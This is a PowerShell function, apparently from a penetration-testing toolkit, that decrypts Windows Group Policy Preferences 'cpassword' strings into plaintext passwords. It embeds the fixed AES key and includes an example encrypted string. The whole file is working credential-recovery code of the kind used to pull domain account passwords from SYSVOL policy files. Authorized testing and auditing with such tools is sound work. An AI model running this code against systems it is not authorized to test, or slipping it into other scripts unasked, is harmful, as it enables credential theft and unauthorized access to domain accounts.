﻿function Get-DecryptedCpassword {
<#
.SYNOPSIS

    Retrieves the plaintext password for encrypted Cpassword strings.

    Author: Chris Campbell (@obscuresec)
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
 
.PARAMETER Cpassword

    Encrypted and encoded Cpassword string from GPP xml files.

.EXAMPLE

    Get-DecryptedCpassword "etEVCyPCcMYqaeM+ycU8uwdqbIvuYAbf+vJeIkT6uW9m5Z7B2LKu3bhr9gYS4Y+/sFEtp0UK7iSJhblpqQ+pkA"

.LINK

    http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
    http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences

#>
    Param (
        [Parameter(Position = 0, Mandatory = $True)]
        [ValidateNotNullOrEmpty()]
        [String]
        $Cpassword
        )
       
         try {
            
             #Append appropriate padding based on string length  
             $Mod = ($Cpassword.length % 4)
             if ($Mod -ne 0) {$Cpassword += ('=' * (4 - $Mod))}

             $Base64Decoded = [Convert]::FromBase64String($Cpassword)
            
             #Create a new AES .NET Crypto Object
             $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
             [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                                  0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
            
             #Set IV to all nulls to prevent dynamic generation of IV value
             $AesIV = New-Object Byte[]($AesObject.IV.Length) 
             $AesObject.IV = $AesIV
             $AesObject.Key = $AesKey
             $DecryptorObject = $AesObject.CreateDecryptor() 
             [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
            
             return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
        
         } catch {Write-Error "$Error[0]"}
     }

    